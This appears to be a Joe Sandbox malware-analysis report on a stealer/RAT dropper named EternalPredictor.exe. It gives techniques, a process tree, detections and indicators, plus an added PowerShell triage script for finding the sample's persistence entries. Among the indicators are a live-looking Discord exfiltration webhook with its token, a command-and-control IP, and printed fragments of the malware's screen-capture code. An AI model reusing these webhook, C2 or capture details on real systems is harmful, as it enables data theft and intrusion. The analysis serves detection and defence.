                        Defense Evasion: 1 File and Directory Permissions Modification; 41 Disable or Modify Tools; 111 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 21 Obfuscated Files or Information; 1 Install Root Certificate; 2 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 2 Modify Registry; 261 Virtualization/Sandbox Evasion; 111 Process Injection
                        Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                        Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 48 System Information Discovery; 1 Query Registry; 471 Security Software Discovery; 2 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; System Network Connections Discovery; Process Discovery
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
                        Collection: 11 Archive Collected Data; 3 Data from Local System; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
                        Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
                        Impact: 1 Data Encrypted for Impact; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking
                        Behavior Graph

                        Behavior Graph ID: 1557106 | Sample: EternalPredictor.exe | Startdate: 17/11/2024 | Architecture: WINDOWS | Score: 100
                        DNS/IP info at the root: ip-api.com; api.ipify.org; discord.com
                        Signatures at the root: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 22 other signatures

                        Process tree (numbers are the graph's own node ids):

                        2 Start
                          12 EternalPredictor.exe
                            dropped: C:\Users\user\AppData\Roaming\skuld.exe (PE32+); C:\Users\user\AppData\Roaming\program.exe (PE32+); C:\Users\user\AppData\Roaming\eternal.exe (PE32); C:\Users\user\...ternalPredictor.exe.log (CSV)
                            22 program.exe
                              dropped: C:\Users\user\AppData\Local\...\rarreg.key (ASCII); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\sqlite3.dll (PE32+); 16 other files (none is malicious)
                              signatures: Multi AV Scanner detection for dropped file; Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; 2 other signatures
                              35 program.exe
                                network: discord.com 162.159.128.233, 443, 49718 CLOUDFLARENETUS United States
                                signatures: Tries to harvest and steal browser information (history, passwords, etc); Modifies Windows Defender protection settings; Modifies the hosts file; 5 other signatures
                                55 cmd.exe
                                  signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Encrypted powershell cmdline option found; 2 other signatures
                                  68 powershell.exe
                                    signatures: Loading BitLocker PowerShell Module
                                  71 conhost.exe
                                58 cmd.exe
                                  signatures: Modifies Windows Defender protection settings
                                  73 powershell.exe
                                  75 conhost.exe
                                60 cmd.exe
                                  signatures: Adds a directory exclusion to Windows Defender
                                  77 powershell.exe
                                  79 conhost.exe
                                66 (23 other processes)
                                  signatures: Writes to foreign memory regions; Tries to harvest and steal WLAN passwords
                                  83 getmac.exe
                                    signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
                                  85 (42 other processes)
                                    dropped: C:\Users\user\AppData\...\3pyiazzo.cmdline (Unicode)
                                    88 csc.exe
                                      dropped: C:\Users\user\AppData\Local\...\3pyiazzo.dll (PE32)
                                      91 cvtres.exe
                            26 skuld.exe
                              network: ip-api.com 208.95.112.1, 49707, 49716, 49717 TUT-ASUS United States; api.ipify.org 172.67.74.152, 443, 49706 CLOUDFLARENETUS United States
                              dropped: C:\Users\user\...\SecurityHealthSystray.exe (PE32+)
                              signatures: Installs new ROOT certificates; Found many strings related to Crypto-Wallets (likely being stolen); Uses cmd line tools excessively to alter registry or file data
                              39 conhost.exe
                              41 attrib.exe
                              43 attrib.exe
                              45 WMIC.exe
                            29 eternal.exe
                              network: 147.185.221.23, 33942, 49709, 49712 SALSGIVERUS United States
                              dropped: C:\Users\user\AppData\Roaming\XClient.exe (PE32)
                              signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Creates multiple autostart registry keys; Uses schtasks.exe or at.exe to add and modify task schedules
                              47 schtasks.exe
                                62 conhost.exe
                          15 SecurityHealthSystray.exe
                            signatures: Multi AV Scanner detection for dropped file; UAC bypass detected (Fodhelper)
                            31 cmd.exe
                              49 fodhelper.exe
                                64 SecurityHealthSystray.exe
                                  81 conhost.exe
                              51 fodhelper.exe
                              53 fodhelper.exe
                            33 conhost.exe
                          18 XClient.exe
                          20 XClient.exe

Source | Detection | Scanner | Label | Link
EternalPredictor.exe | 57% | Virustotal | | Browse
EternalPredictor.exe | 58% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
EternalPredictor.exe | 100% | Avira | TR/Dropper.Gen |
EternalPredictor.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\libffi-8.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\libssl-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\python313.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\rar.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | 63% | ReversingLabs | Win64.Trojan.YanismaStealer
C:\Users\user\AppData\Roaming\XClient.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Roaming\eternal.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Roaming\program.exe | 45% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\skuld.exe | 63% | ReversingLabs | Win64.Trojan.YanismaStealer
                        No Antivirus matches
Source | Detection | Scanner | Label | Link
discord.com | 0% | Virustotal | | Browse
ip-api.com | 0% | Virustotal | | Browse
api.ipify.org | 0% | Virustotal | | Browse
                        No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.128.233 | true | false | |
api.ipify.org | 172.67.74.152 | true | true | |
ip-api.com | 208.95.112.1 | true | true | |
Name | Malicious | Antivirus Detection | Reputation
https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM | false | |
147.185.221.23 | true | |
https://api.ipify.org/ | true | |
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/program.exe, 00000008.00000002.1939236456.00000237A4D49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://www.ifeng.com/program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsprogram.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://www.zhihu.com/program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchprogram.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://www.rfc-editor.org/rfc/rfc8259#section-8.1program.exe, 00000008.00000002.1939236456.00000237A4D49000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://contoso.com/powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://oneget.orgXpowershell.exe, 00000033.00000002.1693664914.000001F881653000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allprogram.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://api.gofile.io/getServerprogram.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngprogram.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpfalse
[Map of contacted IPs by country omitted from this export; its legend binned countries by share of contacted IPs: No. of IPs < 25%, 25% to 50%, 50% to 75%, 75% and above.]

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
162.159.128.233 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
147.185.221.23 | unknown | United States | 12087 | SALSGIVERUS | true
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557106
Start date and time: 2024-11-17 11:20:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 107
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: EternalPredictor.exe
Detection: MAL
Classification: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@170/58@5/4
EGA Information:
• Successful, ratio: 30%
HCA Information:
• Successful, ratio: 61%
• Number of executed functions: 140
• Number of non-executed functions: 168
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 172.217.16.195
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, gstatic.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target EternalPredictor.exe, PID 2852 because it is empty
• Execution Graph export aborted for target SecurityHealthSystray.exe, PID 3948 because it is empty
• Execution Graph export aborted for target XClient.exe, PID 6540 because it is empty
• Execution Graph export aborted for target XClient.exe, PID 7084 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 2212 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7984 because it is empty
• Execution Graph export aborted for target skuld.exe, PID 3872 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateFile calls found
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtEnumerateKey calls found
• Report size getting too big, too many NtOpenFile calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtQueryVolumeInformationFile calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:21:20 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
05:21:22 | API Interceptor | 7687549x Sleep call for process: eternal.exe modified
05:21:25 | API Interceptor | 142x Sleep call for process: powershell.exe modified
11:21:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
11:21:24 | Task Scheduler | Run new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
11:21:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
11:21:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
11:21:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
11:21:57 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
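The timeline above records four persistence artifacts for the current user: two Run-key values (one under a decoy name, "Realtek HD Audio Universal Service", pointing into %APPDATA%\Microsoft\Protect), a scheduled task named XClient, and a Startup-folder shortcut. The following triage script is an added example, not part of the Joe Sandbox report and not code from the sample; it checks a live host for exactly those artifacts. It assumes the victim profile is the user running the script (the report's C:\Users\user is replaced by $env:APPDATA); every value name, task name and path is copied from the timeline.

```powershell
# Added triage check for the persistence artifacts listed in the timeline.
# Not from the Joe Sandbox report or the malware. Assumes the current user is the
# affected profile; names and paths below are taken from the report's timeline.

$ErrorActionPreference = 'Stop'
$findings = New-Object System.Collections.Generic.List[object]

function Add-Finding {
    param([string]$Type, [string]$Name, [string]$Observed)
    $findings.Add([pscustomobject]@{ Type = $Type; Name = $Name; Observed = $Observed })
}

# Run-key values from the report. The timeline lists each value twice (native HKCU
# view and the "HKCU64" view); on the host both resolve to the same key, so one
# query covers both entries.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$expected = @{
    'Realtek HD Audio Universal Service' = Join-Path $env:APPDATA 'Microsoft\Protect\SecurityHealthSystray.exe'
    'XClient'                            = Join-Path $env:APPDATA 'XClient.exe'
}

if (Test-Path $runKey) {
    $run = Get-ItemProperty -Path $runKey
    foreach ($name in $expected.Keys) {
        $prop = $run.PSObject.Properties[$name]
        if ($prop) {
            $verdict = if ($prop.Value -ieq $expected[$name]) { 'exact match' } else { 'same value name, different data' }
            Add-Finding -Type 'Run key' -Name $name -Observed "$($prop.Value) ($verdict)"
        }
    }
}

# Scheduled task "XClient" (created at 11:21:24 in the timeline). Report the
# action it executes, since the task name alone could be reused by anything.
$task = Get-ScheduledTask -TaskName 'XClient' -ErrorAction SilentlyContinue
if ($task) {
    $exec = ($task.Actions | ForEach-Object { $_.Execute }) -join '; '
    Add-Finding -Type 'Scheduled task' -Name $task.TaskName -Observed $exec
}

# Startup-folder shortcut: resolve its target instead of trusting the file name.
$lnk = Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk'
if (Test-Path $lnk) {
    $target = (New-Object -ComObject WScript.Shell).CreateShortcut($lnk).TargetPath
    Add-Finding -Type 'Startup .lnk' -Name 'XClient.lnk' -Observed $target
}

# The dropped binaries themselves. SecurityHealthSystray.exe is also a legitimate
# Windows binary under System32; only the copy under %APPDATA%\Microsoft\Protect
# is the indicator, so the full path is checked rather than the file name.
foreach ($path in $expected.Values) {
    if (Test-Path $path) {
        $sha256 = (Get-FileHash -Path $path -Algorithm SHA256).Hash
        Add-Finding -Type 'Dropped file' -Name (Split-Path $path -Leaf) -Observed "$path sha256=$sha256"
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No persistence artifacts from the report were found for the current user.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

Two caveats when running this. It only inspects the profile of the user executing it, because all four artifacts live in HKCU and %APPDATA%; on a shared host, repeat the check per user (load each NTUSER.DAT or query HKU\<SID>) rather than assuming a single profile. And a hit on the value name with different data is still worth a look, since the sandbox saw only one build of the dropper and later builds may change the drop path while keeping the decoy name.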
No context
Process: C:\Users\user\Desktop\EternalPredictor.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: true
Reputation: unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):654
                                                                                                                                                                                                                                Entropy (8bit):5.380476433908377
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):448373
                                                                                                                                                                                                                                Entropy (8bit):7.925553642784118
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:k5JBrPvEtHK6VxR6r4AIo4PSI6rh3qHDuw3RaD3PxeICSylGnafSC5oUMAWwMF9I:klyPPGpbTpFCStSnRMqa1GLz3ZClW
                                                                                                                                                                                                                                MD5:7E8C4FE8EB788DC6AFB97B328DF86A65
                                                                                                                                                                                                                                SHA1:42723617EA47C453B5A5E0BE374A407FCE3B3DFD
                                                                                                                                                                                                                                SHA-256:3D9EB23038D60B4CE4AF676A5D487A88B14DC8F39450D4C5194427820E14A4F0
                                                                                                                                                                                                                                SHA-512:4A5F922419336782FD1B8660BDD75F9240974CCA957329E1720BC28BD547DD1A6226AD25862B6418AB90796C3E111F4C95467547B87A900DBCCD06D40575D1F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....].u...}.z.w..M..{/....?N.....}y..;Nlc....=....q......}/z..v.`....$....}...!.#....~..]g..}..1.QU.f.Zgk..|..V.v.k...i..&.9..U~.k......j..{.e.....9....~...7"}..x_.d$....5@..U.v.+.......-..G...T..)+6.'..A..^..}'..-....mA..C.~....WP?vY..^S;fiG..=t.?XR.7L.G.4,.......zJ...wE_F.;.........s..[.....gZ.....w@..q.!....+...T..................g.}../...~../.aP......k.....m.g.iI.g|.>.p....O=...1.~$..h.X>..!.V}.......~`.O._..........B.....O>......../.w....}..(.L..'..G..{C......q\?..c\k..|..1..xd.q.....~w'4....*6.....q.......J....=..3.N.q......s...........7..P.{A..5?..../.[.i,....=aB.....b..8.b...i.q......X_..m.q...0v.o...=........b.f.......}.K;n..~..nw...w....x?{...}n..v{.c..w.Vlk.....5/1f.x.]KK....g.......Z....[.....'..s........}.nM..|[....lB..s.y...iq.......v.5.....7B.>.j............5;..q}l5..c....?%^7..)O.g....s..c...m{C.o.s.M.)...q-.t=.16...
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1004
                                                                                                                                                                                                                                Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):609
                                                                                                                                                                                                                                Entropy (8bit):5.327664507012047
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5CHhJV:p37Lvkmb6KOkqe1xBkrk+ikbNJ+WZEvX
                                                                                                                                                                                                                                MD5:A9AE9B66BDE4219B04913CB4FCA08B51
                                                                                                                                                                                                                                SHA1:2EC62B5A34C7B165AACE9A64C89D2A53A7739711
                                                                                                                                                                                                                                SHA-256:66FEDCC7BB255562CE0A93940D0615A27291A1DE9DAF2CE116503A387BFE62C1
                                                                                                                                                                                                                                SHA-512:DD8A3FEF00299408641FE09B03094CBA6869216FDF3DD07D20408090071F6A184B2768E9483EFC7FC3180F378C407B00CBA821F181F503AAA57C8BE5A3424B2D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.0.cs"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                                                Entropy (8bit):3.1566406826290354
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:6M7oEAtf0KhzBU/rJzf6mtJGN0tpW1ullta36uq:4Nz0rJGm+OFXtK6
                                                                                                                                                                                                                                MD5:F0A246323C87348A3074B710BEADFC55
                                                                                                                                                                                                                                SHA1:815E0EBEF004B7373313FDEEB75752417C8A8366
